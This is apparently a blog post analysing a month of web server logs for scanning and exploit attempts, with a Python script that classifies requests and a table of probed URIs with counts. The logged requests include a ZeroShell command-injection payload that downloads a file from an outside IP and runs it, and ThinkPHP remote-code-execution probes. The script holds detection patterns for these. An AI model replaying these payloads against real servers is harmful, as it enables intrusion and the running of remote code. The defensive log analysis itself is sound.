ITオムライス

Web server log analysis: June

2021-07-15 Technical

I analyzed the logs of the public-facing web server for traffic that was not normal access.

Most frequent requests

PHPUnit vulnerability

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

WordPress-related

Probing of the login page

/wp-login.php
/wordpress/wp-login.php
/wp/wp-login.php
/blog/wp-login.php

Vulnerability in the File Manager plugin for WordPress

About the vulnerability in the File Manager plugin for WordPress

/wp-content/plugins/wp-file-manager/readme.txt

Vulnerability in the Windows Live Writer plugin for WordPress

There were multiple requests attempting to access the configuration file of the Windows Live Writer plugin.

//wp/wp-includes/wlwmanifest.xml
//wp-includes/wlwmanifest.xml
//wordpress/wp-includes/wlwmanifest.xml
//cms/wp-includes/wlwmanifest.xml
//site/wp-includes/wlwmanifest.xml
//blog/wp-includes/wlwmanifest.xml

Attacks exploiting a ThinkPHP vulnerability

/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

ZeroShell vulnerability in cgi-bin/kerbynet allowing arbitrary command execution

JVNDB-2009-005813 - JVN iPedia - Vulnerability Countermeasure Information Database

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22
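As an added example (not code from the original post), the following script shows how the per-URI counts and the categories above can be produced from a combined-format access log. It parses each line, undoes Apache's \xHH escaping and percent-encoding so that signatures are matched against what the client actually sent, classifies the request against patterns for the scan types discussed above (the category names are my own), and tallies suspicious requests by URI, category and source address. The sample log lines are constructed for this example using RFC 5737 documentation addresses; the "suspicious = matched a signature or got a 4xx" rule is a triage heuristic, not a rule stated in the post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" log format (not from the original post).
# Source and download addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = r"""
203.0.113.10 - - [03/Jun/2021:10:15:02 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [03/Jun/2021:10:15:03 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jun/2021:11:02:44 +0900] "GET /wp-login.php HTTP/1.1" 404 196 "-" "python-requests/2.25"
198.51.100.7 - - [03/Jun/2021:11:02:45 +0900] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "python-requests/2.25"
192.0.2.55 - - [04/Jun/2021:02:30:11 +0900] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 196 "-" "-"
192.0.2.55 - - [04/Jun/2021:02:30:12 +0900] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F192.0.2.1%2Fzero;sh%20zero;%22 HTTP/1.1" 404 196 "-" "-"
203.0.113.200 - - [04/Jun/2021:09:00:00 +0900] "GET /.env HTTP/1.1" 404 196 "-" "-"
203.0.113.200 - - [04/Jun/2021:09:00:05 +0900] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method uri proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Apache writes non-printable bytes and backslashes in the request line as \xHH.
_APACHE_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")

# Category names are my own (assumption); patterns follow the request paths seen above.
SIGNATURES = [
    ("phpunit-eval-stdin", re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
    ("wordpress-login-probe", re.compile(r"/wp-login\.php(\?|$)", re.I)),
    ("wp-file-manager-probe", re.compile(r"/wp-content/plugins/wp-file-manager/readme\.txt", re.I)),
    ("wlwmanifest-probe", re.compile(r"/wp-includes/wlwmanifest\.xml", re.I)),
    ("thinkphp-invokefunction", re.compile(r"invokefunction.*call_user_func_array", re.I)),
    ("zeroshell-kerbynet", re.compile(r"/cgi-bin/kerbynet\?.*Section=NoAuthREQ", re.I)),
]


def decode_uri(uri: str) -> str:
    """Undo Apache's \\xHH escaping, then percent-decoding, to recover what the client sent."""
    unescaped = _APACHE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), uri)
    return unquote(unescaped)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(uri: str) -> str:
    """Name the first signature that matches the decoded URI, or 'unclassified'."""
    decoded = decode_uri(uri)
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return "unclassified"


def analyze(log_text: str) -> dict:
    """Count suspicious requests by raw URI, by category and by source address.

    Heuristic (assumption): a request is suspicious if it matches a signature or
    produced a 4xx, so unknown probes such as /.env still surface for manual review.
    """
    uri_counts, category_counts, sources = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line.strip())
        if not rec:
            continue
        category = classify(rec["uri"])
        if category == "unclassified" and not rec["status"].startswith("4"):
            continue
        uri_counts[rec["uri"]] += 1
        category_counts[category] += 1
        sources[rec["ip"]] += 1
    return {"uri": uri_counts, "category": category_counts, "source": sources}


def top_uris(result: dict, n: int = 20):
    """The 'uri count' table: most frequent suspicious URIs first."""
    return result["uri"].most_common(n)


if __name__ == "__main__":
    summary = analyze(SAMPLE_LOG)
    for uri, count in top_uris(summary):
        print(f"{count:5d}  {classify(uri):24s} {uri}")
    print("sources:", summary["source"].most_common())
```

To run this over a real log, replace SAMPLE_LOG with the file contents; the decoded form returned by decode_uri is also what you want to look at when triaging a URI like the kerbynet one, since the shell commands only become readable after percent-decoding.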

List of suspicious requests

URI  count
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 197
/.env 182
/ads.txt 162
/wp-login.php 117
/_ignition/execute-solution 113
/wp-content/plugins/wp-file-manager/readme.txt 85
/api/jsonws/invoke 85
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 83
/console/ 83
/Autodiscover/Autodiscover.xml 80
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 76
/app-ads.txt 52
/owa/ 49
/solr/admin/info/system?wt=json 46
http://passport.baidu.com/ 40
/wordpress/wp-login.php 40
/wp/wp-login.php 39
/blog/wp-login.php 39
/mifs/.;/services/LogService 38
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 30
/manager/html 28
/images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi 27
/system_api.php 26
mstshash=Administr 25
//a2billing/customer/templates/default/footer.tpl 25
/?a=fetch&content=die(@md5(HelloThinkCMF)) 24
/login 23
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 23
/boaform/admin/formLogin 23
/?XDEBUG_SESSION_START=phpstorm 23
* 23
/actuator/health 22
/GponForm/diag_Form?style/ 20
/jenkins/login 19
/config/getuser?index=0 19
/streaming/clients_live.php 18
/stream/live.php 18
/stalker_portal/c/version.js 18
/c/version.js 18
/clientaccesspolicy.xml 17
/.well-known/security.txt 15
/administrator/admin/index.php?lang=en 14
/_phpmyadmin/index.php?lang=en 14
//xmlrpc.php?rsd 14
//wp/wp-includes/wlwmanifest.xml 14
//wp-includes/wlwmanifest.xml 14
//wordpress/wp-includes/wlwmanifest.xml 14
//site/wp-includes/wlwmanifest.xml 14
//cms/wp-includes/wlwmanifest.xml 14
//blog/wp-includes/wlwmanifest.xml 14
/sql/php-myadmin/index.php?lang=en 13
/invoker/readonly 13
/admin.php 13
/GponForm/diag_Form?images/ 13
/.git/config 13
/wp-includes/js/jquery/jquery.js 12
/vendor/phpunit/phpunit/build.xml 12
/tags 12
/shopdb/index.php?lang=en 12
/plugins/system/debug/debug.xml 12
/mysql/dbadmin/index.php?lang=en 12
/misc/ajax.js 12
/js/header-rollup-554.js 12
/images/editor/separator.gif 12
/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media 12
/db/websql/index.php?lang=en 12
/administrator/language/en-GB/install.xml 12
/administrator/help/en-GB/toc.json 12
/administrator/db/index.php?lang=en 12
/administrator/ 12
/admin/view/javascript/common.js 12
/admin/includes/general.js 12
/admin/config.php 12
/PMA2013/index.php?lang=en 12
/HNAP1/ 12
/0bef 12
//wp2/wp-includes/wlwmanifest.xml 12
//wp1/wp-includes/wlwmanifest.xml 12
//website/wp-includes/wlwmanifest.xml 12
//web/wp-includes/wlwmanifest.xml 12
//test/wp-includes/wlwmanifest.xml 12
//sito/wp-includes/wlwmanifest.xml 12
//shop/wp-includes/wlwmanifest.xml 12
//news/wp-includes/wlwmanifest.xml 12
//2019/wp-includes/wlwmanifest.xml 12
/test.php 11
/sql/phpMyAdmin2/index.php?lang=en 11
/phpmyadmin2020/index.php?lang=en 11
/phpMyAdmin4/index.php?lang=en 11
/mysql/web/index.php?lang=en 11
/bag2 11
/_phpMyAdmin/index.php?lang=en 11
/PMA/index.php?lang=en 11
/sqlmanager/index.php?lang=en 10
/sql/sql/index.php?lang=en 10
/sitemap.xml 10
/phppma/index.php?lang=en 10
/phpmyadmin2015/index.php?lang=en 10
/phpmyadmin2014/index.php?lang=en 10
/phpmy/index.php?lang=en 10
/favicon.png 10
/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE 10
/admin/web/index.php?lang=en 10
/admin/sqladmin/index.php?lang=en 10
/Telerik.Web.UI.WebResource.axd?type=rau 10
/PMA2014/index.php?lang=en 10
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 10
/tot43/DESKTOP-JGLLJLF_W10016299.1CF3DD28B304BBF734B33FBDF1762BBE/83/ 9
/pma2015/index.php?lang=en 9
/phpmyadmin5/index.php?lang=en 9
/phpmyadmin2013/index.php?lang=en 9
/phpMyAdmin_/index.php?lang=en 9
/phpMyAdmin2/index.php?lang=en 9
/phpMyAdmin-3/index.php?lang=en 9
/mysqladmin/index.php?lang=en 9
/mysql-admin/index.php?lang=en 9
/myadmin/index.php?lang=en 9
/db/phpMyAdmin/index.php?lang=en 9
/db/dbadmin/index.php?lang=en 9
/administrator/PMA/index.php?lang=en 9
/stalker_portal/c/ 8
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ 8
/sql/websql/index.php?lang=en 8
/sql/phpMyAdmin/index.php?lang=en 8
/solr/ 8
/pma2019/index.php?lang=en 8
/pma2016/index.php?lang=en 8
/pma2011/index.php?lang=en 8
/phpmyadmin2018/index.php?lang=en 8
/phpMyAdmin5/index.php?lang=en 8
/phpMyAdmin3/index.php?lang=en 8
/php-my-admin/index.php?lang=en 8
/mysql/sqlmanager/index.php?lang=en 8
/mysql/db/index.php?lang=en 8
/mysql/admin/index.php?lang=en 8
/db/webadmin/index.php?lang=en 8
/db/phpmyadmin3/index.php?lang=en 8
/data/admin/allowurl.txt 8
/client_area/ 8
/2phpmyadmin/index.php?lang=en 8
/1.php 8
/tags/visual-studio-code 7
/tags/hugo 7
/sql/sqlweb/index.php?lang=en 7
/shell.php 7
/public/.env 7